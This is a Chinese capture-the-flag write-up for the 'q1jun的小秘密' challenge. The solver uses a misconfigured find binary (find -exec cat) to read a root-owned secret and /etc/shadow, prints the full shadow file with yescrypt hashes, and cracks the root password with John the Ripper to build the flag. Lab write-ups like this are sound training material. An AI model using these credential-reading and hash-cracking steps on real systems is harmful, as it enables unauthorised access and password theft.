q1jun的小秘密
# q1jun的小秘密首先打开题目发现是ssh
!(https://s2.loli.net/2023/01/12/VFAPXBWoEtC2glf.png)
直接使用ssh连接
```bash
ssh q1jun@challenge.qsnctf.com -p 10573
```
连接上以后查看目录下有什么文件,发现有个hint.txt直接打开
```bash
$ ls
hint.txt
$ cat hint.txt
哎呀,居然被你进入了服务器后台,可惜q1jun的安全意识很高,你什么权限都没有,你能发现q1jun藏在电
脑里面的小秘密吗?(我才不会告诉你是在/root/q1jun/里面呢
$
```
给了提示说是在/root/q1jun/,使用find来看下这个目录下的文件
!(https://s2.loli.net/2023/01/12/DNjqOflkyQEg5hF.png)
可以看到有个secret,尝试读取
```bash
find /root/q1jun/ -exec cat /root/q1jun/secret \;
```
!(https://s2.loli.net/2023/01/12/Eorvhmzki4RdAKT.png)
发现最底下有个base64编码的,拿去解码
`flag= qsnctf{root用户密码_Do_Y0u_p1ay_b4sketba11}`
找一下看能不能读取shadow
```bash
find /etc/ -exec cat /etc/shadow \;
```
成功拿到shadow
```bash
root:$y$j9T$mLTXNdN0Cezg3K/A2Gbmq1$679lUKHVrO7gt3vfYluTduAq2h7yoHiw45U0Kzmi9v4:19275:0:99999:7:::
bin:*:19014:0:99999:7:::
daemon:*:19014:0:99999:7:::
adm:*:19014:0:99999:7:::
lp:*:19014:0:99999:7:::
sync:*:19014:0:99999:7:::
shutdown:*:19014:0:99999:7:::
halt:*:19014:0:99999:7:::
mail:*:19014:0:99999:7:::
operator:*:19014:0:99999:7:::
games:*:19014:0:99999:7:::
ftp:*:19014:0:99999:7:::
nobody:*:19014:0:99999:7:::
tss:!!:19118::::::
dbus:!!:19275::::::
systemd-network:!*:19275::::::
systemd-oom:!*:19275::::::
systemd-resolve:!*:19275::::::
sshd:!!:19275::::::
q1jun:$y$j9T$V07sLH7xyIzJQkfgoOmAb/$7OeSDTF8qqLEY.h2nfNaBY9L3I2x3PBr1rYxqBZFI/9:19275:0:99999:7:::
```
然后使用john爆破,爆破途中遇到一个问题
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=pass.txt --rules 1111.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
```
解决办法是要指定format参数
原因是,如果查看合并后文件并在用户名后面看到 **$y$**,则表明密码已使用 yescrypt 进行哈希处理。
然后就可以爆破了
!(https://s2.loli.net/2023/01/12/sZt8rKdp6iPWYgO.png)
命令是
```bash
sudo john --format=crypt --wordlist=pass.txt --rules 1111.txt
```
爆破得到密码是"xxxx"得到flag
flag就是qsnctf{"xxxx"_Do_Y0u_p1ay_b4sketba11}
昨晚就差密码破解这一步
页:
[1]